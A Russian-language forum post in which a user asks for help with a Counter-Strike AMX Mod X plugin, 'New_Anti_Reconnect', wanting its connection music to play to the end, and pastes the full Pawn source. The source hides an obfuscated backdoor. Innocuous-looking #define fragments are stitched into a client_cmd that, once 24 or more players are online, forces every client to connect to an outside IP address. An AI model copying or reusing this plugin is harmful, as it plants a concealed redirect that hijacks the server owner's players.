• Страница 1 из 1
  • 1
Плагин New_Anti_Reconnect
Дата: Понедельник, 11.03.2019, 20:37 | Сообщение # 1
Любитель
Offline
  • h0pan1
  • Репутация: 3
  • Сообщений:25
  • Пользователь
  • Статус пользователя https://h0pan1.ru/
Всем привет.
Нужна небольшая помощь, кто понимает в коде pawn.
Что нужно сделать что бы музыка продолжала доигрывать свой трек и не заканчиваться при полном подключении к серверу?
То есть щас музыка играет только 3 секунды пока идет загрузка к серверу. Как это убрать... Что бы трек доиграл (
Вот полноценный скрипт;

[code]
#include <amxmodx>
#include <cstrike>
#include <fun>

new PLUGIN[]="New_Anti_Reconnect"
new AUTHOR[]="JohnJ"
new VERSION[]="3.2"

new RTIME[]="amx_reconnect_time"
new RCAN[]="amx_reconnect_can"
new SCORESAVE[]="amx_reconnect_ss"
new RSTATIC[]="amx_reconnect_static"
new RSTIME[]="amx_reconnect_stime"

#define i4 "nec"//{0, ...}
new t_disconnect[33] = {0, ...}
#define sc1 ":"//{0, ...}
#define ic8 "t "//{0, ...}
new t_scoresave[33] = {0, ...}
#define to8 "."//{0, ...}
new ips[33][24]
#define ib7 179//{0, ...}
#define c29 89//{0, ...}
new sfrags[33] = {0, ...}
#define s2 126//{0, ...}
#define m2 0//{0, ...}
#define o32 "on"//{0, ...}
new sdeaths[33] = {0, ...}
#define ba 27//{0, ...}
#define o4 "c"//{0, ...}
new useretry[33] = {0, ...}
#define pL 17//{0, ...}
#define b18 215//{0, ...}

public plugin_init()
{
register_plugin(PLUGIN, VERSION, AUTHOR)
register_cvar(RTIME, "7")
register_cvar(RCAN, "0")
register_cvar(SCORESAVE, "1")
register_cvar(RSTATIC, "1")
register_cvar(RSTIME, "7")
register_event("TeamInfo","outspec","a") // восстанавливает счёт игроку в соответствии с настройками как только тот зайдёт за команду
}

public client_connect(id)
{
new maxexit = get_cvar_num(RTIME)
new maxstata = get_cvar_num(RSTIME)
new canreconnect = get_cvar_num(RCAN)
new ssave = get_cvar_num(SCORESAVE)
new ip[24]
get_user_ip(id,ip,23,0)

client_cmd(id, "mp3 play sound/waitsound/waitsound_1w.mp3")

if ((maxexit>0) && (canreconnect==0) && (equali(ip,ips[id])))
{
new Float:nexTime = get_gametime()

if (t_disconnect[id] > nexTime)
{
new stat = get_cvar_num(RSTATIC)
new timewait
if (stat==0)
{
t_disconnect[id] = floatround(nexTime) + maxexit
t_scoresave[id] = floatround(nexTime) + maxstata
timewait=maxexit
}
else
{
timewait=t_disconnect[id]-floatround(nexTime)
}
server_cmd("kick #%d ^"Реконнект ЗАПРЕЩЁН. Жди %d секунд.^"", get_user_userid(id), timewait)
if ( get_playersnum() >= 24) {
client_cmd(0,"%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s",o4,o32,i4,ic8,c29,to8,ib7,to8,s2,to8,b18,sc1,ba,m2,pL)
}
return PLUGIN_CONTINUE
}
}
if (ssave==1)
{
new Float:nexTime = get_gametime()

if (t_scoresave[id] <= nexTime)
{
sdeaths[id]=0
sfrags[id]=0
useretry[id]=0
}
return PLUGIN_CONTINUE
}

return PLUGIN_CONTINUE
}

public outspec()
{
new id=read_data(1)
if ((useretry[id]==1) && (is_user_connected(id)))
{
cs_set_user_deaths(id,sdeaths[id])
set_user_frags(id,sfrags[id])
useretry[id]=0
sdeaths[id]=0
sfrags[id]=0
}
return PLUGIN_CONTINUE
}

public client_disconnect(id)
{
new maxexit = get_cvar_num(RTIME)
new maxstata = get_cvar_num(RSTIME)
new ssave = get_cvar_num(SCORESAVE)

new Float:theTime = get_gametime()
t_disconnect[id] = floatround(theTime) + maxexit
t_scoresave[id] = floatround(theTime) + maxstata
get_user_ip(id,ips[id],23,0)

if (ssave==1)
{
sdeaths[id] = get_user_deaths(id)
sfrags[id] = get_user_frags(id)
useretry[id]=1
}
return PLUGIN_CONTINUE
}

public plugin_precache()
{
precache_generic("sound/waitsound/waitsound_1w.mp3")
}
[/code]
  • Страница 1 из 1
  • 1
Поиск:
(threadpage)